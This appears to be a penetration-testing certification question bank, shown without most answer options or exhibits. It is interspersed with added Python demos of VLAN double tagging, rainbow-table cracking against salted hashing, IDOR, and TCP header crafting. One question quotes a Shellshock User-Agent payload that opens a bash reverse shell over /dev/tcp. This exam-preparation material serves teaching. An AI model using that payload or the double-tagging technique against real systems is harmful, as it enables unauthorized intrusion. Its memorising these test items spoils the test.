Questions and Answers
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging.
Which of the following techniques would BEST accomplish this goal?
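Double tagging relies on how an 802.1Q trunk treats its native VLAN: frames for the native VLAN leave the trunk untagged, so a frame that carries two stacked tags loses only the outer one and arrives at the next switch still tagged with the inner, target VLAN. The following is an added example, not part of the original question set, that builds such a frame byte by byte and models the two switch hops. The MAC addresses, VLAN numbers and the simplified switch behaviour are constructed for the demonstration.

```python
import struct

ETHERTYPE_8021Q = 0x8100   # 802.1Q tag protocol identifier (TPID)
ETHERTYPE_IPV4 = 0x0800


def mac(s):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(s.replace(":", ""))


def vlan_tag(vid, pcp=0, dei=0):
    """Encode one 802.1Q tag: TPID 0x8100 followed by the 16-bit TCI (PCP|DEI|VID)."""
    if not 0 <= vid <= 4095:
        raise ValueError("VLAN ID must fit in 12 bits")
    tci = (pcp << 13) | (dei << 12) | vid
    return struct.pack("!HH", ETHERTYPE_8021Q, tci)


def build_frame(dst, src, vids, ethertype, payload):
    """Ethernet II frame with zero or more stacked 802.1Q tags (outermost first)."""
    tags = b"".join(vlan_tag(v) for v in vids)
    return dst + src + tags + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    """Return (dst, src, [vids outermost first], ethertype, payload)."""
    dst, src = frame[:6], frame[6:12]
    off, vids = 12, []
    while struct.unpack("!H", frame[off:off + 2])[0] == ETHERTYPE_8021Q:
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        vids.append(tci & 0x0FFF)
        off += 4
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    return dst, src, vids, ethertype, frame[off + 2:]


def trunk_egress(frame, native_vid):
    """Simplified 802.1Q trunk behaviour (constructed model): native-VLAN traffic is
    sent untagged, so a frame whose outer tag equals native_vid has that tag removed.
    Any inner tag is left in place, which is exactly what double tagging abuses."""
    dst, src, vids, ethertype, payload = parse_frame(frame)
    if vids and vids[0] == native_vid:
        vids = vids[1:]
    return build_frame(dst, src, vids, ethertype, payload)


def delivered_vlan(frame, default_vid):
    """Simplified downstream switch (constructed model): forward into the VLAN named
    by the first tag, or into the port's default VLAN if the frame arrives untagged."""
    vids = parse_frame(frame)[2]
    return vids[0] if vids else default_vid


def double_tag_demo(attacker_vid, native_vid, target_vid):
    """Constructed scenario: a host in attacker_vid sends a frame tagged
    [attacker_vid, target_vid] toward a trunk whose native VLAN is native_vid.
    Returns the VLAN the downstream switch finally forwards the frame into."""
    frame = build_frame(mac("ff:ff:ff:ff:ff:ff"), mac("02:00:00:00:00:01"),
                        [attacker_vid, target_vid], ETHERTYPE_IPV4,
                        b"\x45" + b"\x00" * 19)           # dummy IPv4 header bytes
    on_wire = trunk_egress(frame, native_vid)
    return delivered_vlan(on_wire, default_vid=attacker_vid)


if __name__ == "__main__":
    print("native VLAN == attacker VLAN ->", double_tag_demo(1, 1, 20))
    print("native VLAN moved elsewhere  ->", double_tag_demo(1, 999, 20))
```

The second call shows the usual mitigation: when the trunk's native VLAN is not the VLAN the attacker sits in (or native traffic is tagged as well), the outer tag survives and the frame stays in the attacker's own VLAN. Note also that the attack is one-way; replies from the target VLAN never come back through the same trick.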
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

    exploit = {
        "User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1",
        "Accept": "text/html,application/xhtml+xml,application/xml",
    }
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.
Which of the following are considered passive reconnaissance tools? (Choose two.)
A penetration tester wants to scan a target network without being detected by the client's IDS.
Which of the following scans is MOST likely to avoid detection?
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT?
SIMULATION -
You are a penetration tester running port scans on a server.
INSTRUCTIONS -
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.
Which of the following should be included as a recommendation in the remediation report?
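Unsalted MD5 falls to a rainbow table because the hash depends on the password alone: the table is computed once and consulted for every stolen hash. The following is an added example, not part of the original question set, that contrasts that storage scheme with a per-user salt and a slow key-derivation function. The wordlist, passwords and the dictionary standing in for a rainbow table are constructed for the demonstration; a real table uses hash chains to save space, but the lookup it supports is the same.

```python
import hashlib
import hmac
import os


def md5_unsalted(password):
    """What the server in the question stored: fast, unsalted, and directly
    matchable against a precomputed table."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(wordlist):
    """Constructed stand-in for a rainbow table: hash -> plaintext for a wordlist."""
    return {md5_unsalted(w): w for w in wordlist}


def salted_hash(password, salt=None, iterations=600_000):
    """Return (salt, digest) using a random per-user salt and PBKDF2-HMAC-SHA256."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def salted_verify(password, salt, digest, iterations=600_000):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def demo(iterations=1_000):
    """Show why the MD5 hashes fell to a table and why salted hashes do not.
    iterations is lowered from the production default only to keep the demo fast."""
    wordlist = ["password", "Summer2023!", "letmein"]          # constructed
    table = build_lookup_table(wordlist)

    # Two users chose the same password: unsalted MD5 gives identical hashes,
    # and a single table lookup recovers both.
    h1, h2 = md5_unsalted("Summer2023!"), md5_unsalted("Summer2023!")
    cracked = table.get(h1)

    # Salted: same password, different salts, different digests, and a table
    # keyed on the password alone cannot even be consulted.
    s1, d1 = salted_hash("Summer2023!", iterations=iterations)
    s2, d2 = salted_hash("Summer2023!", iterations=iterations)
    return {
        "md5_identical": h1 == h2,
        "md5_cracked": cracked,
        "salted_identical": d1 == d2,
        "salted_in_table": table.get(d1.hex()),
        "salted_verifies": (salted_verify("Summer2023!", s1, d1, iterations)
                            and not salted_verify("wrong", s2, d2, iterations)),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The salt defeats precomputation; the iteration count is what limits per-hash brute force, which salting alone does not address. bcrypt, scrypt or Argon2 serve the same purpose as the PBKDF2 call here and are the usual recommendation in a remediation report.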
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A penetration tester runs the unshadow command on a machine.
Which of the following tools will the tester most likely use NEXT?
A penetration tester obtained the following results after scanning a web server using the dirb utility:
Which of the following elements is MOST likely to contain useful information for the penetration tester?
A company has hired a penetration tester to deploy and set up a rogue access point on the network.
Which of the following is the BEST tool to use to accomplish this goal?
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.
Which of the following can be used to ensure the tester is able to maintain access to the system?
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:
Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contract with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A penetration tester has prepared the following phishing email for an upcoming penetration test:
Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
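The URL change in this question works because the handler authenticates the user and then trusts the client-supplied id without asking whether that record belongs to the user, an insecure direct object reference. The following is an added example, not part of the original question set, that places the vulnerable handler next to a hardened one and drives both with the URLs from the question. The account records, user names and the handler interface are constructed for the demonstration.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass(frozen=True)
class Account:
    id: int
    owner: str
    balance: float


# Constructed sample data standing in for the application's database.
ACCOUNTS = {
    5: Account(5, "alice", 120.0),
    10: Account(10, "bob", 9800.0),
}


class NotFound(Exception):
    pass


def id_from_url(url):
    """Pull the client-controlled id out of .../login.php?id=N."""
    qs = parse_qs(urlsplit(url).query)
    return int(qs["id"][0])


def get_account_vulnerable(session_user, account_id):
    """IDOR: the handler knows who is logged in but never uses that fact,
    so any authenticated user can read any account by changing the number."""
    acct = ACCOUNTS.get(account_id)
    if acct is None:
        raise NotFound(account_id)
    return acct


def get_account_hardened(session_user, account_id):
    """Resolve the object, then check that it belongs to the session user.
    Missing and foreign records raise the same error so ids cannot be enumerated
    by telling 'does not exist' apart from 'not yours'."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct.owner != session_user:
        raise NotFound(account_id)
    return acct


def serve(url, session_user, handler):
    """Return the owner of the account the handler releases, or None if refused."""
    try:
        return handler(session_user, id_from_url(url)).owner
    except NotFound:
        return None


if __name__ == "__main__":
    for url in ("http://example.com/login.php?id=5", "http://example.com/login.php?id=10"):
        print(url, "as alice, vulnerable:", serve(url, "alice", get_account_vulnerable))
        print(url, "as alice, hardened:  ", serve(url, "alice", get_account_hardened))
```

The fix is the ownership check on the server side, not a less guessable id: random identifiers only slow enumeration, while the authorization check closes the hole regardless of how the id is chosen.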
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.
Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
Which of the following would a company's hunt team be MOST interested in seeing in a final report?
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
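A packet-crafting tool lets the tester set the TCP data offset (header length) and checksum to values the kernel's socket API would never emit. The following is an added example, not part of the original question set, that does the same thing by hand in plain Python so the fields and the checksum computation are visible: the segment is assembled as bytes with correct defaults, and either field can be overridden with an arbitrary number. The addresses and ports are constructed for the demonstration; sending the bytes would additionally require a raw socket, which is deliberately left out here.

```python
import socket
import struct

TCP_PROTO = 6


def ones_complement_sum(data):
    """Sum 16-bit big-endian words with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip, dst_ip, segment):
    """Internet checksum over the IPv4 pseudo-header plus the whole TCP segment."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, TCP_PROTO, len(segment)))
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_tcp(src_ip, dst_ip, sport, dport, seq=0, ack=0, flags=0x02,
              window=65535, payload=b"", data_offset=None, csum=None):
    """Build a TCP segment. data_offset (header length in 32-bit words) and csum
    default to correct values but accept arbitrary numbers, which is the kind of
    malformed input the question wants to send to the proprietary service."""
    if data_offset is None:
        data_offset = 5                       # 20-byte header, no options
    off_flags = ((data_offset & 0xF) << 12) | (flags & 0x1FF)
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, off_flags, window, 0, 0)
    if csum is None:
        csum = tcp_checksum(src_ip, dst_ip, hdr + payload)
    # checksum occupies header bytes 16-17
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def data_offset_of(segment):
    return struct.unpack("!H", segment[12:14])[0] >> 12


def checksum_of(segment):
    return struct.unpack("!H", segment[16:18])[0]


def checksum_valid(src_ip, dst_ip, segment):
    """A receiver's check: summing a segment that carries a correct checksum yields 0."""
    return tcp_checksum(src_ip, dst_ip, segment) == 0


if __name__ == "__main__":
    src, dst = "10.0.0.5", "10.0.0.9"          # constructed addresses
    good = build_tcp(src, dst, 40000, 3011, payload=b"PING")
    print("well-formed SYN valid:", checksum_valid(src, dst, good))
    lied = build_tcp(src, dst, 40000, 3011, data_offset=15)
    print("data offset claims", data_offset_of(lied) * 4, "bytes in a",
          len(lied), "byte segment")
    bad = build_tcp(src, dst, 40000, 3011, csum=0xBEEF)
    print("forced checksum valid:", checksum_valid(src, dst, bad))
```

Observe two separate failure modes worth probing: a data offset that claims more header than the segment contains (the stack or the service must bound-check before reading options), and a checksum the receiver should reject before the payload ever reaches the service. Scapy does the same field handling with its `TCP(dataofs=..., chksum=...)` layer; the point of writing it out is to see exactly which bytes change.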
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A penetration tester writes the following script:
Which of the following is the tester performing?
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:
Which of the following would be the BEST command to use for further progress into the targeted network?
An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
During an engagement, a penetration tester found the following list of strings inside a file:
Which of the following is the BEST technique to determine the known plaintext of the strings?
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:
Which of the following BEST describes why this script triggered a probable port scan alert in the organization's IDS?
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A penetration tester gains access to a system and establishes persistence. Which of the following actions is the tester MOST likely performing after running the given commands?
A compliance-based penetration test is primarily concerned with:
A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891. Which of the following commands could be used to download a file named exploit to a target machine for execution?
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
Which of the following is MOST important to include in the final report of a static application security test that was written for a team of application developers as the intended audience?
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A penetration tester was brute forcing an internal web server and ran a command that produced output, but when trying to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. What is the MOST likely reason for the lack of output?
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following MOST likely describes what happened?
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. What is the penetration tester trying to accomplish?
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare.
B. Perform a manual test on the server.
C. Check the results on the scanner.
D. Look for the vulnerability online.
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?
A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack?
A penetration tester writes a script to achieve certain objectives. Which of the following objectives is the tester attempting to achieve?
A penetration tester ran the following commands on a Windows server. Which of the following should the tester do AFTER delivering the final report?
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE? (Select all that apply)